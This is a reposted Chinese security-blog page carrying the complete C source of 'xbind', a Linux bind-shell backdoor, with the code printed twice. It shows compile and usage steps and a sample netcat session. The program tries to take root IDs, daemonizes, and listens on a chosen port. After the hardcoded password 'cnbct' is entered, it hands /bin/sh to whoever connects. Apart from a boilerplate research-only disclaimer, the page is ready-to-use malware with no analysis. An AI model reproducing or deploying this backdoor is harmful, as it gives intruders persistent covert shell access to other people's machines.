linux下的后门:xbind.c 's

admin
admin
admin
139526
文章
114
评论
2017年4月24日11:18:04评论260 views字数 2324阅读7分44秒阅读模式
摘要

/*------------------------------------------------------
xbind.c A bindshell backdoor on linux
c0de by xy7[B.C.T]
Mail:[email protected]
Our te4m:www.cnbct.org
Compile:
gcc -o xbind xbind.c
run now:
./xbind 1985
C:/>nc -vv 192.168.1.52 1985
192.168.1.52: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.1.52] 1985 (?) open
Enert your password: cnbct
Welcome to shell
let's do it:
-------------------------------------------------------*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define ENTERPASS "Enert your password: /0"
#define WELCOME "Welcome to shell/r/nlet's do it:/r/n"
#define PASSWORD "cnbct"
int main(int argc, char **argv)
{
struct sockaddr_in s_addr;
struct sockaddr_in c_addr;
char buf[1024];
pid_t pid;
int i,sock_descriptor,temp_sock_descriptor,c_addrsize;

setuid(0);
setgid(0);
seteuid(0);
setegid(0);

if (argc!=2){
printf("=================================/r/n");
printf("|xbind.c by xy7[B.C.T]/r/n");
printf("|Usage:/r/n");
printf("|./xbind 1985/r/n");
printf("|nc -vv targetIP 1985/r/n");
printf("|enter the password to get shell/r/n");
printf("|Have a nice day;)/r/n");
printf("=================================/r/n");
exit(1);

}
if (fork()){
exit(0);
}

sock_descriptor=socket(AF_INET,SOCK_STREAM,0);
if (socket(AF_INET,SOCK_STREAM,0)==-1){
printf("socket failed!");
exit(1);
}
memset(&s_addr,0,sizeof(s_addr));
//bzero(&s_addr,sizeof(s_addr));
s_addr.sin_family=AF_INET;
s_addr.sin_addr.s_addr=htonl(INADDR_ANY);
s_addr.sin_port=htons(atoi(argv[1]));
if (bind(sock_descriptor,(struct sockaddr *)&s_addr,sizeof(s_addr))==-1){
printf("bind failed!");
exit(1);
}
if (listen(sock_descriptor,20)==-1)//accept 20 connections
{
printf("listen failed!");
exit(1);
}
c_addrsize=sizeof(c_addr);
temp_sock_descriptor=accept(sock_descriptor,(struct sockaddr *)&c_addr,&c_addrsize);
//recv
while(temp_sock_descriptor){
pid=fork();
if (pid>0) {
close(temp_sock_descriptor);
continue;
}else if (pid==0){
write(temp_sock_descriptor, ENTERPASS, strlen(ENTERPASS));
memset(buf, '/0', 1024);
recv(temp_sock_descriptor, buf, 1024, 0);

if (strncmp(buf,PASSWORD,5) !=0){
close(temp_sock_descriptor);
exit(1);
}

write(temp_sock_descriptor, WELCOME, strlen(WELCOME));
dup2(temp_sock_descriptor,0);
dup2(temp_sock_descriptor,1);
dup2(temp_sock_descriptor,2);
execl("/bin/sh", "sh", (char *) 0);
close(temp_sock_descriptor);
exit(0);
}else{

exit(1);
}
}

close(sock_descriptor);
return 0;
}


/*------------------------------------------------------
xbind.c A bindshell backdoor on linux
c0de by xy7[B.C.T]
Mail:[email protected]
Our te4m:www.cnbct.org
Compile:
gcc -o xbind xbind.c
run now:
./xbind 1985
C:/>nc -vv 192.168.1.52 1985
192.168.1.52: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.1.52] 1985 (?) open
Enert your password: cnbct
Welcome to shell
let's do it:
-------------------------------------------------------*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define ENTERPASS "Enert your password: /0"
#define WELCOME "Welcome to shell/r/nlet's do it:/r/n"
#define PASSWORD "cnbct"
int main(int argc, char **argv)
{
struct sockaddr_in s_addr;
struct sockaddr_in c_addr;
char buf[1024];
pid_t pid;
int i,sock_descriptor,temp_sock_descriptor,c_addrsize;

setuid(0);
setgid(0);
seteuid(0);
setegid(0);

if (argc!=2){
printf("=================================/r/n");
printf("|xbind.c by xy7[B.C.T]/r/n");
printf("|Usage:/r/n");
printf("|./xbind 1985/r/n");
printf("|nc -vv targetIP 1985/r/n");
printf("|enter the password to get shell/r/n");
printf("|Have a nice day;)/r/n");
printf("=================================/r/n");
exit(1);

}
if (fork()){
exit(0);
}

sock_descriptor=socket(AF_INET,SOCK_STREAM,0);
if (socket(AF_INET,SOCK_STREAM,0)==-1){
printf("socket failed!");
exit(1);
}
memset(&s_addr,0,sizeof(s_addr));
//bzero(&s_addr,sizeof(s_addr));
s_addr.sin_family=AF_INET;
s_addr.sin_addr.s_addr=htonl(INADDR_ANY);
s_addr.sin_port=htons(atoi(argv[1]));
if (bind(sock_descriptor,(struct sockaddr *)&s_addr,sizeof(s_addr))==-1){
printf("bind failed!");
exit(1);
}
if (listen(sock_descriptor,20)==-1)//accept 20 connections
{
printf("listen failed!");
exit(1);
}
c_addrsize=sizeof(c_addr);
temp_sock_descriptor=accept(sock_descriptor,(struct sockaddr *)&c_addr,&c_addrsize);
//recv
while(temp_sock_descriptor){
pid=fork();
if (pid>0) {
close(temp_sock_descriptor);
continue;
}else if (pid==0){
write(temp_sock_descriptor, ENTERPASS, strlen(ENTERPASS));
memset(buf, '/0', 1024);
recv(temp_sock_descriptor, buf, 1024, 0);

if (strncmp(buf,PASSWORD,5) !=0){
close(temp_sock_descriptor);
exit(1);
}

write(temp_sock_descriptor, WELCOME, strlen(WELCOME));
dup2(temp_sock_descriptor,0);
dup2(temp_sock_descriptor,1);
dup2(temp_sock_descriptor,2);
execl("/bin/sh", "sh", (char *) 0);
close(temp_sock_descriptor);
exit(0);
}else{

exit(1);
}
}

close(sock_descriptor);
return 0;
}

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月24日11:18:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   linux下的后门:xbind.c 'shttps://cn-sec.com/archives/49137.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息